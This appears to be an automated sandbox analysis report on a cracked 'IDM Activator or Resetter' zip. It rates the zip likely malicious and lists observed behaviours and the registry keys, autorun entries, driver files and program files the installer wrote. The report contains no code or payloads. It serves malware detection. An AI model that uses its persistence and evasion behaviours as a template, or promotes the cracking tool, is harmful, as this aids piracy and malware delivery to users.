Analysis Overview
SHA256
f2e4d02007b32da7272d9850e3387e03931db5b3ca881f2ad43619b88f01bcb0
Threat Level: Likely malicious
The file IDM 6.xx Activator or Resetter v3.3 by CrackingCity Team.zip was found to be: Likely malicious.
Malicious Activity Summary
Drops file in Drivers directory
Blocklisted process makes network request
Sets file to hidden
Downloads MZ/PE file
Reads user/profile data of web browsers
Registers COM server for autorun
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Installs/modifies Browser Helper Object
Checks whether UAC is enabled
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Delays execution with timeout.exe
Modifies registry class
Suspicious use of SendNotifyMessage
Modifies registry key
Runs net.exe
Creates scheduled task(s)
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Uses Task Scheduler COM API
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Suspicious behavior: LoadsDriver
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Kills process with taskkill
Modifies data under HKEY_USERS
Runs ping.exe
Views/modifies file attributes
Enumerates processes with tasklist
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-01 05:27
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-01 05:27
Reported
2024-05-01 05:35
Platform
win11-20240426-en
Max time kernel
445s
Max time network
446s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\idmwfp.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\idmwfp.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\idmwfp.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\idmwfp.sys | C:\Windows\system32\DrvInst.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32 | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32 | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMGetAll64.dll" | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMShellExt64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMShellExt64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMShellExt64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4764030F-2733-45B9-AE62-3D1F4F6F2861}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMShellExt64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMGetAll64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5312C54E-A385-46B7-B200-ABAF81B03935}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7D11E719-FF90-479C-B0D7-96EB43EE55D7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D}\InprocServer32 | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\downlWithIDM64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMIECC64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" | C:\Windows\system32\RUNDLL32.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Microsoft\Windows\CurrentVersion\Run\IDMan = "C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe /onboot" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" | C:\Windows\system32\RUNDLL32.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" | C:\Windows\system32\RUNDLL32.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" | C:\Windows\system32\RUNDLL32.EXE | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8} | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\ = "IDM Helper" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\NoExplorer = "1" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8} | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\ = "IDM Helper" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\NoExplorer = "1" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{104c0d70-21ea-d54a-a47f-5c386244cb51}\idmwfp64.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\idmwfp.inf_amd64_8b0ebbc2b4585464\idmwfp64.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{104c0d70-21ea-d54a-a47f-5c386244cb51}\SETDDC4.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{104c0d70-21ea-d54a-a47f-5c386244cb51}\SETDDD4.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{104c0d70-21ea-d54a-a47f-5c386244cb51}\idmwfp.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{104c0d70-21ea-d54a-a47f-5c386244cb51}\SETDDD5.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{104c0d70-21ea-d54a-a47f-5c386244cb51} | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{104c0d70-21ea-d54a-a47f-5c386244cb51}\SETDDC4.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{104c0d70-21ea-d54a-a47f-5c386244cb51}\SETDDD5.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{104c0d70-21ea-d54a-a47f-5c386244cb51}\idmwfp.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\idmwfp.inf_amd64_8b0ebbc2b4585464\idmwfp64.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\idmwfp.inf_amd64_8b0ebbc2b4585464\idmwfp.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{104c0d70-21ea-d54a-a47f-5c386244cb51}\SETDDD4.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\idmwfp.inf_amd64_8b0ebbc2b4585464\idmwfp.cat | C:\Windows\system32\DrvInst.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Internet Download Manager\idmmzcc.xpi | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\tips_id.txt | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_sw.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\tutor.chm | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\idmbrbtn.dll | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_chn.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_vn.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_gu.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\tips.txt | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Toolbar\3d_largeHot_3.bmp | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\defexclist.txt | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.json | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\IDMVMPrs64.dll | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Toolbar\3d_small_3.bmp | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_tr.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_my.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\idmnmcl.dll | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\idmfsa.dll | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_de.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_mn.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_be.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\idmwfp64.sys | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\IEGetVL.htm | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\idmftype.dll | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_cz.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\inst_sr.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_fi.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\license.txt | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\idmwfp32.sys | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| File created | C:\Program Files (x86)\Internet Download Manager\Languages\idm_gr.lng | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
